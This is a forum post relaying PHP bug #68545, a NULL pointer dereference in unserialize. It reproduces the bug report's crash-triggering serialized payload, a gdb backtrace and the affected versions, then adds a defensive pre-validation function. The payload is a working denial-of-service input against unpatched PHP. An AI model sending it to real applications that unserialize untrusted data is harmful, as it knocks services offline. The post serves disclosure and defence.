天空小小岛 Technical Forum

[Other] A vulnerability in PHP's unserialize

s.Bo posted on 2014-12-29 10:32:20
This post was last edited by s.Bo on 2014-12-29 10:36

The PHP 5.6.4 ChangeLog shows that a vulnerability was fixed:
Fixed bug #68545 (NULL pointer dereference in unserialize.c).


https://bugs.php.net/bug.php?id=68545

Description:
------------
There's a NULL pointer dereference issue in the var_push_dtor function in unserialize.c.

By running the test script, you'll get the following segfault:
Program received signal SIGSEGV, Segmentation fault.
var_push_dtor (var_hashx=0x0, rval=0x7ffff7fdb858) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:62
62              var_entries *var_hash = (*var_hashx)->last_dtor;


According to 3v4l.org, it crashes on the following versions (http://3v4l.org/BtYZg):
4.3.10 - 4.4.9, 5.0.3 - 5.6.3, php7@20140507 - 20141101



Test script:
---------------
<?php
echo unserialize('a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"b22";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";s:3:"bar";');
?>


Expected result:
----------------
The interpreter shouldn't crash.

Actual result:
--------------
(gdb) bt
#0  var_push_dtor (var_hashx=0x0, rval=0x7ffff7fdb7d0) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:62
#1  0x00000000004481af in process_nested_data (p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x0, ht=0x7ffff7fdb700, elements=4, objprops=0, rval=<optimized out>)
    at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:329
#2  0x0000000000fdc686 in php_var_unserialize (rval=<optimized out>, p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x0) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:815
#3  0x0000000000447436 in process_nested_data (p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x7fffffffab90, ht=0x7ffff7fdb678, elements=5, objprops=0, rval=<optimized out>)
    at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:297
#4  0x0000000000fdc686 in php_var_unserialize (rval=<optimized out>, p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x7fffffffab90) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:815
#5  0x0000000000f9884a in zif_unserialize (ht=<optimized out>, return_value=0x7ffff7fda908, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>)
    at /home/charlie/php-5.6.3/ext/standard/var.c:965
#6  0x000000000158cf5c in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7fa8110) at /home/charlie/php-5.6.3/Zend/zend_vm_execute.h:558
#7  0x0000000001483b1a in execute_ex (execute_data=0x7ffff7fa8110) at /home/charlie/php-5.6.3/Zend/zend_vm_execute.h:363
#8  0x00000000012824cd in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /home/charlie/php-5.6.3/Zend/zend.c:1344
#9  0x000000000105522a in php_execute_script (primary_file=0x7fffffffd1c0) at /home/charlie/php-5.6.3/main/main.c:2584
#10 0x000000000159a1ed in do_cli (argc=3, argv=0x22979a0) at /home/charlie/php-5.6.3/sapi/cli/php_cli.c:994
#11 0x000000000045052d in main (argc=3, argv=0x22979a0) at /home/charlie/php-5.6.3/sapi/cli/php_cli.c:1378
#12 0x00007ffff710976d in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6
#13 0x0000000000450601 in _start ()



The test code from the bug report crashes PHP outright as soon as unserialize runs:
<?php
echo unserialize('a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"b22";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";s:3:"bar";');


Affected versions
PHP 5.0.*
PHP 5.2.*
PHP 5.3.*
PHP 5.4.* versions < 5.4.36
PHP 5.5.* versions < 5.5.20
PHP 5.6.* versions < 5.6.4
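The crashing payload above is structurally malformed: arrays declare 6 elements, use arrays as keys and end before the declared count is reached. Upgrading to a fixed version is the real remedy; as defence in depth for applications that must call unserialize() on untrusted data, the following added example (not code from the bug report or from PHP itself; function names are hypothetical, PHP 7+ assumed) validates the serialized format strictly before the interpreter's parser touches it.

```php
<?php
// Added example, not from the bug report or PHP's own sources.
// Structural pre-check for serialized input: every declared element count and
// string length must match the bytes that follow, nesting depth is capped, and
// only scalars and arrays are accepted (no O:/C: objects). Malformed payloads
// such as the crashing string above fail here instead of reaching unserialize().
function is_wellformed_serialized(string $s, int $maxDepth = 32): bool
{
    $pos = 0;
    return parse_value($s, $pos, strlen($s), 0, $maxDepth) && $pos === strlen($s);
}

function parse_value(string $s, int &$pos, int $len, int $depth, int $maxDepth): bool
{
    if ($depth > $maxDepth || $pos >= $len) return false;
    switch ($s[$pos]) {
        case 'N': // null
            if (substr($s, $pos, 2) !== 'N;') return false;
            $pos += 2;
            return true;
        case 'b': case 'i': case 'd': // bool (0/1), int, float (decimal or exponent form)
            if (!preg_match('/\G(?:b:[01]|i:-?[0-9]+|d:-?[0-9]+(?:\.[0-9]+)?(?:E[+-]?[0-9]+)?);/', $s, $m, 0, $pos)) return false;
            $pos += strlen($m[0]);
            return true;
        case 's': // string: the declared byte length must be followed by exactly '";'
            if (!preg_match('/\Gs:([0-9]+):"/', $s, $m, 0, $pos)) return false;
            $end = $pos + strlen($m[0]) + (int)$m[1];
            if (substr($s, $end, 2) !== '";') return false;
            $pos = $end + 2;
            return true;
        case 'a': // array: exactly n key/value pairs, keys must be int or string
            if (!preg_match('/\Ga:([0-9]+):\{/', $s, $m, 0, $pos)) return false;
            $pos += strlen($m[0]);
            for ($i = 0, $n = (int)$m[1]; $i < $n; $i++) {
                if ($pos >= $len || ($s[$pos] !== 'i' && $s[$pos] !== 's')) return false;
                if (!parse_value($s, $pos, $len, $depth + 1, $maxDepth)) return false; // key
                if (!parse_value($s, $pos, $len, $depth + 1, $maxDepth)) return false; // value
            }
            if ($pos >= $len || $s[$pos] !== '}') return false;
            $pos++;
            return true;
        default: // objects (O:, C:) and anything unknown are refused outright
            return false;
    }
}

// Usage: validate first, and only then hand the data to unserialize().
$input = 'a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";'; // leading part of the crashing payload, constructed
$data = is_wellformed_serialized($input) ? unserialize($input) : null;
```

The check rejects the payload at the first array key because the key is itself an array; a well-formed value such as a:2:{i:0;s:3:"foo";s:1:"k";b:1;} passes and is consumed to the last byte.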
